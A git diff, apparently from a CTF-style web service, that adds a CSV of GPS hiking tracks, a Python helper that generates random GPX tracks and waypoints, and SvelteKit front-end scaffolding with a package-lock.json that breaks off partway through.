+
+
+0.0
+
+
+0.0
+
+
+0.0
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+robion ab
+
+
+
+
+
+OruxMaps
+2015-11-25T14:01:37Z
+
+
+robion ab
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: robion ab</h2><br /><p>Startzeit: 11/25/2015 15:01</p><p>Zielzeit: 11/25/2015 16:37</p><p>Strecke: 5,7km (01:35)</p><p>Bewegungszeit: 01:20</p><p>Ø-Geschwindigkeit: 3,6km/h</p><p>Netto-Geschwindigkeit: 4,3km/h</p><p>Max. Geschwindigkeit: 7,5km/h</p><p>Minimale Höhe: 715m</p><p>Maximale Höhe: 1656m</p><p>Steig-Geschw.: 287,8m/h</p><p>Sink-Geschw.: -633,6m/h</p><p>Aufstieg: 25m</p><p>Abstieg: -940m</p><p>Steigzeit: 00:05</p><p>Sinkzeit: 01:29</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1656.52
+2015-11-25T14:01:39Z
+
+
+1641.06
+2015-11-25T14:03:17Z
+
+
+1630.93
+2015-11-25T14:04:24Z
+
+
+1609.96
+2015-11-25T14:05:35Z
+
+
+1578.96
+2015-11-25T14:07:50Z
+
+
+1568.43
+2015-11-25T14:09:17Z
+
+
+1540.02
+2015-11-25T14:11:48Z
+
+
+1533.52
+2015-11-25T14:12:54Z
+
+
+1523.81
+2015-11-25T14:13:51Z
+
+
+1517.47
+2015-11-25T14:14:09Z
+
+
+1511.05
+2015-11-25T14:15:02Z
+
+
+1487.93
+2015-11-25T14:16:32Z
+
+
+1465.99
+2015-11-25T14:18:13Z
+
+
+1448.52
+2015-11-25T14:19:19Z
+
+
+1427.56
+2015-11-25T14:21:02Z
+
+
+1397.56
+2015-11-25T14:23:48Z
+
+
+1376.24
+2015-11-25T14:25:40Z
+
+
+1370.06
+2015-11-25T14:26:15Z
+
+
+1355.88
+2015-11-25T14:26:56Z
+
+
+1361.96
+2015-11-25T14:27:18Z
+
+
+1330.48
+2015-11-25T14:30:06Z
+
+
+1315.91
+2015-11-25T14:31:36Z
+
+
+1305.93
+2015-11-25T14:32:22Z
+
+
+1280.67
+2015-11-25T14:34:38Z
+
+
+1241.96
+2015-11-25T14:38:29Z
+
+
+1241.37
+2015-11-25T14:38:47Z
+
+
+1237.77
+2015-11-25T14:39:10Z
+
+
+1215.43
+2015-11-25T14:41:12Z
+
+
+1178.97
+2015-11-25T14:44:19Z
+
+
+1166.56
+2015-11-25T14:45:35Z
+
+
+1154.67
+2015-11-25T14:47:09Z
+
+
+1121.42
+2015-11-25T14:50:51Z
+
+
+1118.97
+2015-11-25T14:51:16Z
+
+
+1078.05
+2015-11-25T14:55:01Z
+
+
+1054.14
+2015-11-25T14:58:50Z
+
+
+1045.9
+2015-11-25T14:59:48Z
+
+
+1036.3
+2015-11-25T15:00:28Z
+
+
+1037.34
+2015-11-25T15:01:16Z
+
+
+1017.45
+2015-11-25T15:01:59Z
+
+
+998.41
+2015-11-25T15:03:19Z
+
+
+992.9
+2015-11-25T15:03:50Z
+
+
+979.66
+2015-11-25T15:04:36Z
+
+
+967.81
+2015-11-25T15:05:35Z
+
+
+961.9
+2015-11-25T15:06:41Z
+
+
+936.15
+2015-11-25T15:08:38Z
+
+
+932.78
+2015-11-25T15:09:56Z
+
+
+905.43
+2015-11-25T15:12:19Z
+
+
+902.01
+2015-11-25T15:13:40Z
+
+
+889.77
+2015-11-25T15:14:44Z
+
+
+872.81
+2015-11-25T15:15:22Z
+
+
+851.9
+2015-11-25T15:16:53Z
+
+
+844.93
+2015-11-25T15:18:00Z
+
+
+845.67
+2015-11-25T15:19:31Z
+
+
+818.56
+2015-11-25T15:22:05Z
+
+
+780.93
+2015-11-25T15:22:11Z
+
+
+809.43
+2015-11-25T15:24:27Z
+
+
+794.03
+2015-11-25T15:25:26Z
+
+
+748.81
+2015-11-25T15:27:56Z
+
+
+738.31
+2015-11-25T15:28:51Z
+
+
+726.93
+2015-11-25T15:29:56Z
+
+
+720.3
+2015-11-25T15:31:31Z
+
+
+717.43
+2015-11-25T15:32:27Z
+
+
+723.65
+2015-11-25T15:33:29Z
+
+
+726.4
+2015-11-25T15:35:05Z
+
+
+741.9
+2015-11-25T15:37:25Z
+ "
+"
+
+
+
+
+
+
+
+Track 11.11.2015 - Rigi Hochflue
+
+
+
+1070.08
+
+
+1134.01
+
+
+1137.38
+
+
+1145.55
+
+
+1154.2
+
+
+1161.41
+
+
+1170.06
+
+
+1179.67
+
+
+1199.38
+
+
+1201.3
+
+
+1196.5
+
+
+1204.19
+
+
+1218.61
+
+
+1234.47
+
+
+1242.16
+
+
+1270.04
+
+
+1285.42
+
+
+1310.9
+
+
+1351.27
+
+
+1373.38
+
+
+1366.65
+
+
+1378.67
+
+
+1392.13
+
+
+1396.93
+
+
+1402.7
+
+
+1416.64
+
+
+1424.81
+
+
+1432.02
+
+
+1468.55
+
+
+1528.15
+
+
+1558.43
+
+
+1575.74
+
+
+1596.89
+
+
+1617.07
+
+
+1632.46
+
+
+1659.85
+
+
+1695.9
+
+
+1694.94
+
+
+1697.83
+
+
+1692.54
+
+
+1686.29
+
+
+1679.56
+
+
+1669.95
+
+
+1633.9
+
+
+1626.69
+
+
+1571.89
+
+
+1545.94
+
+
+1520.46
+
+
+1499.79
+
+
+1474.8
+
+
+1465.67
+
+
+1463.26
+
+
+1445.48
+
+
+1436.83
+
+
+1421.45
+
+
+1398.37
+
+
+1384.92
+
+
+1370.98
+
+
+1359.92
+
+
+1317.14
+
+
+1303.69
+
+
+1298.4
+
+
+1282.06
+
+
+1286.38
+
+
+1283.02
+
+
+1280.61
+
+
+1273.88
+
+
+1250.33
+
+
+1236.87
+
+
+1217.65
+
+
+1192.17
+
+
+1188.81
+
+
+1171.98
+
+
+1158.05
+
+
+1159.97
+
+
+1155.16
+
+
+1151.8
+
+
+1148.43
+
+
+1142.18
+ "
+"
+
+
+
+
+
+
+Garmin Connect
+2015-10-24T08:06:59Z
+
+Niederbauen Chulm ( 1923m ) & Gütsch ( 1884m ) 24.10.2015
+
+
+
+1544.4000244140625
+2015-10-24T08:06:59Z
+
+
+1546.199951171875
+2015-10-24T08:14:29Z
+
+
+1556.800048828125
+2015-10-24T08:16:29Z
+
+
+1566.4000244140625
+2015-10-24T08:17:59Z
+
+
+1564.800048828125
+2015-10-24T08:21:29Z
+
+
+1571.199951171875
+2015-10-24T08:22:59Z
+
+
+1571.0
+2015-10-24T08:24:59Z
+
+
+1576.4000244140625
+2015-10-24T08:27:29Z
+
+
+1578.800048828125
+2015-10-24T08:28:29Z
+
+
+1602.5999755859375
+2015-10-24T08:31:29Z
+
+
+1605.4000244140625
+2015-10-24T08:31:59Z
+
+
+1614.4000244140625
+2015-10-24T08:33:29Z
+
+
+1624.5999755859375
+2015-10-24T08:35:29Z
+
+
+1657.199951171875
+2015-10-24T08:44:59Z
+
+
+1662.0
+2015-10-24T08:47:29Z
+
+
+1693.0
+2015-10-24T08:50:59Z
+
+
+1698.0
+2015-10-24T08:54:29Z
+
+
+1716.5999755859375
+2015-10-24T08:56:59Z
+
+
+1715.0
+2015-10-24T08:58:29Z
+
+
+1738.5999755859375
+2015-10-24T09:00:29Z
+
+
+1734.4000244140625
+2015-10-24T09:01:29Z
+
+
+1772.800048828125
+2015-10-24T09:05:59Z
+
+
+1823.199951171875
+2015-10-24T09:13:59Z
+
+
+1837.5999755859375
+2015-10-24T09:16:29Z
+
+
+1859.199951171875
+2015-10-24T09:20:59Z
+
+
+1872.5999755859375
+2015-10-24T09:23:29Z
+
+
+1886.800048828125
+2015-10-24T09:27:29Z
+
+
+1888.0
+2015-10-24T09:28:29Z
+
+
+1889.4000244140625
+2015-10-24T09:29:59Z
+
+
+1881.4000244140625
+2015-10-24T10:06:29Z
+
+
+1885.800048828125
+2015-10-24T10:21:29Z
+
+
+1869.199951171875
+2015-10-24T10:23:29Z
+
+
+1859.4000244140625
+2015-10-24T10:24:29Z
+
+
+1854.5999755859375
+2015-10-24T10:27:59Z
+
+
+1855.5999755859375
+2015-10-24T10:34:59Z
+
+
+1826.800048828125
+2015-10-24T10:40:29Z
+
+
+1810.4000244140625
+2015-10-24T10:43:29Z
+
+
+1726.800048828125
+2015-10-24T10:50:59Z
+
+
+1705.199951171875
+2015-10-24T10:52:59Z
+
+
+1654.5999755859375
+2015-10-24T11:01:29Z
+
+
+1613.0
+2015-10-24T11:05:59Z
+
+
+1609.199951171875
+2015-10-24T11:06:29Z
+
+
+1608.800048828125
+2015-10-24T11:07:59Z
+
+
+1596.0
+2015-10-24T11:08:59Z
+
+
+1597.800048828125
+2015-10-24T11:09:59Z
+
+
+1588.4000244140625
+2015-10-24T11:10:59Z
+
+
+1583.5999755859375
+2015-10-24T11:11:59Z
+
+
+1579.0
+2015-10-24T11:12:59Z
+
+
+1575.800048828125
+2015-10-24T11:13:59Z
+
+
+1570.199951171875
+2015-10-24T11:19:29Z
+
+
+1565.5999755859375
+2015-10-24T11:23:29Z
+
+
+1560.0
+2015-10-24T11:28:59Z
+
+
+1547.0
+2015-10-24T11:32:30Z
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2018-03-24T19:12:53Z
+
+GPSies Track on GPSies.com
+
+
+
+2024.0
+2010-01-01T00:00:00Z
+
+
+2034.0
+2010-01-01T00:00:54Z
+
+
+2013.0
+2010-01-01T00:02:27Z
+
+
+2013.0
+2010-01-01T00:03:58Z
+
+
+2027.0
+2010-01-01T00:04:41Z
+
+
+2041.0
+2010-01-01T00:05:27Z
+
+
+2054.0
+2010-01-01T00:06:11Z
+
+
+2069.0
+2010-01-01T00:06:31Z
+
+
+2093.0
+2010-01-01T00:07:00Z
+
+
+2102.0
+2010-01-01T00:07:21Z
+
+
+2115.0
+2010-01-01T00:07:35Z
+
+
+2162.0
+2010-01-01T00:08:16Z
+
+
+2178.0
+2010-01-01T00:08:43Z
+
+
+2212.0
+2010-01-01T00:09:12Z
+
+
+2219.0
+2010-01-01T00:09:31Z
+
+
+2237.0
+2010-01-01T00:09:54Z
+
+
+2254.0
+2010-01-01T00:10:21Z
+
+
+2265.0
+2010-01-01T00:10:35Z
+
+
+2274.0
+2010-01-01T00:10:52Z
+
+
+2314.0
+2010-01-01T00:11:21Z
+
+
+2325.0
+2010-01-01T00:11:47Z
+
+
+2322.0
+2010-01-01T00:12:04Z
+
+
+2319.0
+2010-01-01T00:12:30Z
+
+
+2327.0
+2010-01-01T00:14:25Z
+
+
+2347.0
+2010-01-01T00:14:38Z
+
+
+2379.0
+2010-01-01T00:15:13Z
+
+
+2394.0
+2010-01-01T00:15:24Z
+
+
+2400.0
+2010-01-01T00:16:04Z
+
+
+2438.0
+2010-01-01T00:16:47Z
+
+
+2461.0
+2010-01-01T00:17:08Z
+
+
+2506.0
+2010-01-01T00:17:37Z
+
+
+2554.0
+2010-01-01T00:18:23Z
+
+
+2612.0
+2010-01-01T00:19:30Z
+
+
+2632.0
+2010-01-01T00:19:44Z
+
+
+2667.0
+2010-01-01T00:20:11Z
+
+
+2684.0
+2010-01-01T00:20:32Z
+
+
+2744.0
+2010-01-01T00:21:13Z
+
+
+2766.0
+2010-01-01T00:21:39Z
+
+
+2748.0
+2010-01-01T00:22:01Z
+
+
+2785.0
+2010-01-01T00:23:47Z
+
+
+2748.0
+2010-01-01T00:24:31Z
+
+
+2687.0
+2010-01-01T00:26:20Z
+
+
+2727.0
+2010-01-01T00:28:46Z
+
+
+2787.0
+2010-01-01T00:29:43Z
+
+
+2729.0
+2010-01-01T00:30:39Z
+
+
+2656.0
+2010-01-01T00:32:07Z
+
+
+2624.0
+2010-01-01T00:32:51Z
+
+
+2613.0
+2010-01-01T00:33:01Z
+
+
+2556.0
+2010-01-01T00:33:38Z
+
+
+2467.0
+2010-01-01T00:34:41Z
+
+
+2425.0
+2010-01-01T00:35:46Z
+
+
+2415.0
+2010-01-01T00:36:33Z
+
+
+2394.0
+2010-01-01T00:37:58Z
+
+
+2364.0
+2010-01-01T00:39:11Z
+
+
+2340.0
+2010-01-01T00:40:03Z
+
+
+2319.0
+2010-01-01T00:40:36Z
+
+
+2307.0
+2010-01-01T00:41:26Z
+
+
+2285.0
+2010-01-01T00:42:04Z
+
+
+2273.0
+2010-01-01T00:42:50Z
+
+
+2273.0
+2010-01-01T00:43:06Z
+
+
+2249.0
+2010-01-01T00:44:02Z
+
+
+2217.0
+2010-01-01T00:44:52Z
+
+
+2204.0
+2010-01-01T00:45:40Z
+
+
+2181.0
+2010-01-01T00:46:35Z
+
+
+2143.0
+2010-01-01T00:47:44Z
+
+
+2108.0
+2010-01-01T00:48:33Z
+
+
+2024.0
+2010-01-01T00:50:11Z
+ "
+"
+
+
+
+
+
+
+2016-07-18T00:26:44Z
+
+
+Gooseneck Lockout
+
+
+
+1440.0
+2016-07-18T00:26:44Z
+
+
+
+
+0.000000
+
+1439.0
+2016-07-18T00:27:52Z
+
+
+
+
+2.397728
+
+1441.0
+2016-07-18T00:28:31Z
+
+
+
+
+7.760750
+
+1452.0
+2016-07-18T00:31:13Z
+
+
+
+
+9.942017
+
+1458.0
+2016-07-18T00:32:43Z
+
+
+
+
+4.994385
+
+1464.0
+2016-07-18T00:33:51Z
+
+
+
+
+7.079712
+
+1464.0
+2016-07-18T00:34:22Z
+
+
+
+
+3.648956
+
+1466.0
+2016-07-18T00:37:58Z
+
+
+
+
+1.642639
+
+1464.0
+2016-07-18T00:39:40Z
+
+
+
+
+8.596558
+
+1463.0
+2016-07-18T00:44:17Z
+
+
+
+
+2.645508
+
+1460.0
+2016-07-18T00:45:48Z
+
+
+
+
+8.176697
+
+1453.0
+2016-07-18T00:47:55Z
+
+
+
+
+6.428833
+
+1443.0
+2016-07-18T00:50:02Z
+
+
+
+
+9.906738
+
+1440.0
+2016-07-18T00:52:25Z
+
+
+
+
+1.986694 "
diff --git a/checkers/explorers/gpxhelper.py b/checkers/explorers/gpxhelper.py
new file mode 100644
index 0000000..77c5364
--- /dev/null
+++ b/checkers/explorers/gpxhelper.py
@@ -0,0 +1,106 @@
+import csv
+import datetime
+import os.path
+import random
+from collections import namedtuple
+from dataclasses import dataclass
+
+import gpxpy
+
+
+@dataclass
+class WaypointParams:
+ name: str
+ description: str
+ sym: str = 'Flag, Blue'
+
+
+Point = namedtuple("Point", "lat lon ele time")
+
+
+class TrackHelper:
+ def __init__(self):
+ self.gpx_raw_files = []
+ with open(os.path.join(os.path.dirname(__file__), 'gpx_ds_small.csv')) as f:
+ reader = csv.reader(f)
+ for row in reader:
+ self.gpx_raw_files.append(row[0])
+
+ def random_point(self) -> Point:
+ lat = random.randint(575700, 660800) / 10000
+ lon = random.randint(278400, 1325900) / 10000
+ return Point(lat, lon, random.randint(500, 800),
+ datetime.datetime.now() - datetime.timedelta(days=random.randint(-1000, 1000)))
+
+ def random_gpx(self, creator: str, num_points=10, waypoints: list[WaypointParams] = None):
+ start = self.random_point()
+ out_points = [gpxpy.gpx.GPXTrackPoint(latitude=start.lat, longitude=start.lon, elevation=start.ele,
+ time=start.time)]
+ for i in range(num_points):
+ prev_point = out_points[-1]
+ latitude, longitude = prev_point.latitude + random.randint(-1,
+ 1) / 1000, prev_point.longitude + random.randint(
+ -1, 1) / 1000
+ elev = prev_point.elevation + random.randint(-10, 10) / 10
+ time = prev_point.time + datetime.timedelta(seconds=random.randint(5, 30))
+ out_points.append(
+ gpxpy.gpx.GPXTrackPoint(latitude=latitude, longitude=longitude, elevation=elev, time=time))
+ wp_out = []
+ for wp in waypoints or []:
+ point = random.choice(out_points)
+ wp_out.append(gpxpy.gpx.GPXWaypoint(
+ latitude=point.latitude,
+ longitude=point.longitude,
+ elevation=point.elevation,
+ name=wp.name,
+ description=wp.description,
+ symbol=wp.sym,
+ time=point.time
+ ))
+
+ return self._generate_gpx(creator, out_points, wp_out)
+
+ def random_gpx_from_ds(self, creator: str, waypoints: list[WaypointParams] = None):
+ gpx_file = random.choice(self.gpx_raw_files)
+ parsed = gpxpy.parse(gpx_file)
+ points = [point
+ for track in parsed.tracks
+ for segment in track.segments
+ for point in segment.points
+ ]
+ while len(points) < 1:
+ gpx_file = random.choice(self.gpx_raw_files)
+ parsed = gpxpy.parse(gpx_file)
+ points = [point
+ for track in parsed.tracks
+ for segment in track.segments
+ for point in segment.points
+ ]
+ wp_out = []
+ for wp in waypoints or []:
+ point = random.choice(points)
+ wp_out.append(gpxpy.gpx.GPXWaypoint(
+ latitude=point.latitude + 0.0001,
+ longitude=point.longitude + 0.0001,
+ elevation=point.elevation,
+ name=wp.name,
+ description=wp.description,
+ symbol=wp.sym,
+ time=point.time
+ ))
+ return self._generate_gpx(creator, points, wp_out)
+
+ def _generate_gpx(self, creator: str, points: list[gpxpy.gpx.GPXTrackPoint],
+ waypoints: list[gpxpy.gpx.GPXWaypoint]):
+ gpx = gpxpy.gpx.GPX()
+ gpx.creator = creator
+
+ gpx_track = gpxpy.gpx.GPXTrack()
+ gpx.tracks.append(gpx_track)
+ gpx_segment = gpxpy.gpx.GPXTrackSegment()
+ gpx_track.segments.append(gpx_segment)
+
+ gpx_segment.points = points
+ gpx.waypoints = waypoints
+
+ return gpx.to_xml(prettyprint=True)
diff --git a/checkers/requirements.txt b/checkers/requirements.txt
index 8e29b77..77609ff 100644
--- a/checkers/requirements.txt
+++ b/checkers/requirements.txt
@@ -1,3 +1,4 @@
checklib
grpcio
protobuf
+gpxpy
diff --git a/internal/explorers-front/.env.development b/internal/explorers-front/.env.development
new file mode 100644
index 0000000..2615a21
--- /dev/null
+++ b/internal/explorers-front/.env.development
@@ -0,0 +1 @@
+PUBLIC_BASE_URL="http://127.0.0.1:8000/api"
\ No newline at end of file
diff --git a/internal/explorers-front/.env.production b/internal/explorers-front/.env.production
new file mode 100644
index 0000000..b3fa440
--- /dev/null
+++ b/internal/explorers-front/.env.production
@@ -0,0 +1 @@
+PUBLIC_BASE_URL="/api"
\ No newline at end of file
diff --git a/internal/explorers-front/.gitignore b/internal/explorers-front/.gitignore
new file mode 100644
index 0000000..8f6c617
--- /dev/null
+++ b/internal/explorers-front/.gitignore
@@ -0,0 +1,12 @@
+.DS_Store
+node_modules
+/build
+/.svelte-kit
+/package
+.env
+.env.*
+!.env.example
+.vercel
+.output
+vite.config.js.timestamp-*
+vite.config.ts.timestamp-*
diff --git a/internal/explorers-front/.npmrc b/internal/explorers-front/.npmrc
new file mode 100644
index 0000000..b6f27f1
--- /dev/null
+++ b/internal/explorers-front/.npmrc
@@ -0,0 +1 @@
+engine-strict=true
diff --git a/internal/explorers-front/README.md b/internal/explorers-front/README.md
new file mode 100644
index 0000000..5c91169
--- /dev/null
+++ b/internal/explorers-front/README.md
@@ -0,0 +1,38 @@
+# create-svelte
+
+Everything you need to build a Svelte project, powered by [`create-svelte`](https://github.com/sveltejs/kit/tree/master/packages/create-svelte).
+
+## Creating a project
+
+If you're seeing this, you've probably already done this step. Congrats!
+
+```bash
+# create a new project in the current directory
+npm create svelte@latest
+
+# create a new project in my-app
+npm create svelte@latest my-app
+```
+
+## Developing
+
+Once you've created a project and installed dependencies with `npm install` (or `pnpm install` or `yarn`), start a development server:
+
+```bash
+npm run dev
+
+# or start the server and open the app in a new browser tab
+npm run dev -- --open
+```
+
+## Building
+
+To create a production version of your app:
+
+```bash
+npm run build
+```
+
+You can preview the production build with `npm run preview`.
+
+> To deploy your app, you may need to install an [adapter](https://kit.svelte.dev/docs/adapters) for your target environment.
diff --git a/internal/explorers-front/jsconfig.json b/internal/explorers-front/jsconfig.json
new file mode 100644
index 0000000..81def15
--- /dev/null
+++ b/internal/explorers-front/jsconfig.json
@@ -0,0 +1,18 @@
+{
+ "extends": "./.svelte-kit/tsconfig.json",
+ "compilerOptions": {
+ "allowJs": true,
+ "checkJs": true,
+ "esModuleInterop": true,
+ "forceConsistentCasingInFileNames": true,
+ "resolveJsonModule": true,
+ "skipLibCheck": true,
+ "sourceMap": true,
+ "strict": true,
+ "moduleResolution": "bundler"
+ }
+ // Path aliases are handled by https://kit.svelte.dev/docs/configuration#alias and https://kit.svelte.dev/docs/configuration#files
+ //
+ // If you want to overwrite includes/excludes, make sure to copy over the relevant includes/excludes
+ // from the referenced tsconfig.json - TypeScript does not merge them in
+}
diff --git a/internal/explorers-front/package-lock.json b/internal/explorers-front/package-lock.json
new file mode 100644
index 0000000..c05e69a
--- /dev/null
+++ b/internal/explorers-front/package-lock.json
@@ -0,0 +1,1939 @@
+{
+ "name": "explorers-front",
+ "version": "0.0.1",
+ "lockfileVersion": 3,
+ "requires": true,
+ "packages": {
+ "": {
+ "name": "explorers-front",
+ "version": "0.0.1",
+ "dependencies": {
+ "@sveltejs/adapter-static": "^2.0.3",
+ "bulma": "^0.9.4",
+ "leaflet": "^1.9.4"
+ },
+ "devDependencies": {
+ "@fontsource/fira-mono": "^4.5.10",
+ "@neoconfetti/svelte": "^1.0.0",
+ "@sveltejs/adapter-auto": "^2.0.0",
+ "@sveltejs/kit": "^1.27.4",
+ "@types/cookie": "^0.5.1",
+ "autoprefixer": "^10.4.16",
+ "svelte": "^4.0.5",
+ "svelte-check": "^3.6.0",
+ "svelte-ionicons": "^0.7.2",
+ "typescript": "^5.0.0",
+ "vite": "^4.4.2"
+ }
+ },
+ "node_modules/@ampproject/remapping": {
+ "version": "2.2.1",
+ "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz",
+ "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==",
+ "dependencies": {
+ "@jridgewell/gen-mapping": "^0.3.0",
+ "@jridgewell/trace-mapping": "^0.3.9"
+ },
+ "engines": {
+ "node": ">=6.0.0"
+ }
+ },
+ "node_modules/@esbuild/android-arm": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.18.20.tgz",
+ "integrity": "sha512-fyi7TDI/ijKKNZTUJAQqiG5T7YjJXgnzkURqmGj13C6dCqckZBLdl4h7bkhHt/t0WP+zO9/zwroDvANaOqO5Sw==",
+ "cpu": [
+ "arm"
+ ],
+ "optional": true,
+ "os": [
+ "android"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/android-arm64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.18.20.tgz",
+ "integrity": "sha512-Nz4rJcchGDtENV0eMKUNa6L12zz2zBDXuhj/Vjh18zGqB44Bi7MBMSXjgunJgjRhCmKOjnPuZp4Mb6OKqtMHLQ==",
+ "cpu": [
+ "arm64"
+ ],
+ "optional": true,
+ "os": [
+ "android"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/android-x64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.18.20.tgz",
+ "integrity": "sha512-8GDdlePJA8D6zlZYJV/jnrRAi6rOiNaCC/JclcXpB+KIuvfBN4owLtgzY2bsxnx666XjJx2kDPUmnTtR8qKQUg==",
+ "cpu": [
+ "x64"
+ ],
+ "optional": true,
+ "os": [
+ "android"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/darwin-arm64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.18.20.tgz",
+ "integrity": "sha512-bxRHW5kHU38zS2lPTPOyuyTm+S+eobPUnTNkdJEfAddYgEcll4xkT8DB9d2008DtTbl7uJag2HuE5NZAZgnNEA==",
+ "cpu": [
+ "arm64"
+ ],
+ "optional": true,
+ "os": [
+ "darwin"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/darwin-x64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.18.20.tgz",
+ "integrity": "sha512-pc5gxlMDxzm513qPGbCbDukOdsGtKhfxD1zJKXjCCcU7ju50O7MeAZ8c4krSJcOIJGFR+qx21yMMVYwiQvyTyQ==",
+ "cpu": [
+ "x64"
+ ],
+ "optional": true,
+ "os": [
+ "darwin"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/freebsd-arm64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.18.20.tgz",
+ "integrity": "sha512-yqDQHy4QHevpMAaxhhIwYPMv1NECwOvIpGCZkECn8w2WFHXjEwrBn3CeNIYsibZ/iZEUemj++M26W3cNR5h+Tw==",
+ "cpu": [
+ "arm64"
+ ],
+ "optional": true,
+ "os": [
+ "freebsd"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/freebsd-x64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.18.20.tgz",
+ "integrity": "sha512-tgWRPPuQsd3RmBZwarGVHZQvtzfEBOreNuxEMKFcd5DaDn2PbBxfwLcj4+aenoh7ctXcbXmOQIn8HI6mCSw5MQ==",
+ "cpu": [
+ "x64"
+ ],
+ "optional": true,
+ "os": [
+ "freebsd"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/linux-arm": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.18.20.tgz",
+ "integrity": "sha512-/5bHkMWnq1EgKr1V+Ybz3s1hWXok7mDFUMQ4cG10AfW3wL02PSZi5kFpYKrptDsgb2WAJIvRcDm+qIvXf/apvg==",
+ "cpu": [
+ "arm"
+ ],
+ "optional": true,
+ "os": [
+ "linux"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/linux-arm64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.18.20.tgz",
+ "integrity": "sha512-2YbscF+UL7SQAVIpnWvYwM+3LskyDmPhe31pE7/aoTMFKKzIc9lLbyGUpmmb8a8AixOL61sQ/mFh3jEjHYFvdA==",
+ "cpu": [
+ "arm64"
+ ],
+ "optional": true,
+ "os": [
+ "linux"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/linux-ia32": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.18.20.tgz",
+ "integrity": "sha512-P4etWwq6IsReT0E1KHU40bOnzMHoH73aXp96Fs8TIT6z9Hu8G6+0SHSw9i2isWrD2nbx2qo5yUqACgdfVGx7TA==",
+ "cpu": [
+ "ia32"
+ ],
+ "optional": true,
+ "os": [
+ "linux"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/linux-loong64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.18.20.tgz",
+ "integrity": "sha512-nXW8nqBTrOpDLPgPY9uV+/1DjxoQ7DoB2N8eocyq8I9XuqJ7BiAMDMf9n1xZM9TgW0J8zrquIb/A7s3BJv7rjg==",
+ "cpu": [
+ "loong64"
+ ],
+ "optional": true,
+ "os": [
+ "linux"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/linux-mips64el": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.18.20.tgz",
+ "integrity": "sha512-d5NeaXZcHp8PzYy5VnXV3VSd2D328Zb+9dEq5HE6bw6+N86JVPExrA6O68OPwobntbNJ0pzCpUFZTo3w0GyetQ==",
+ "cpu": [
+ "mips64el"
+ ],
+ "optional": true,
+ "os": [
+ "linux"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/linux-ppc64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.18.20.tgz",
+ "integrity": "sha512-WHPyeScRNcmANnLQkq6AfyXRFr5D6N2sKgkFo2FqguP44Nw2eyDlbTdZwd9GYk98DZG9QItIiTlFLHJHjxP3FA==",
+ "cpu": [
+ "ppc64"
+ ],
+ "optional": true,
+ "os": [
+ "linux"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/linux-riscv64": {
+ "version": "0.18.20",
+ "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.18.20.tgz",
+ "integrity": "sha512-WSxo6h5ecI5XH34KC7w5veNnKkju3zBRLEQNY7mv5mtBmrP/MjNBCAlsM2u5hDBlS3NGcTQpoBvRzqBcRtpq1A==",
+ "cpu": [
+ "riscv64"
+ ],
+ "optional": true,
+ "os": [
+ "linux"
+ ],
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/@esbuild/linux-s390x": {
+ "version": "0.18.20",
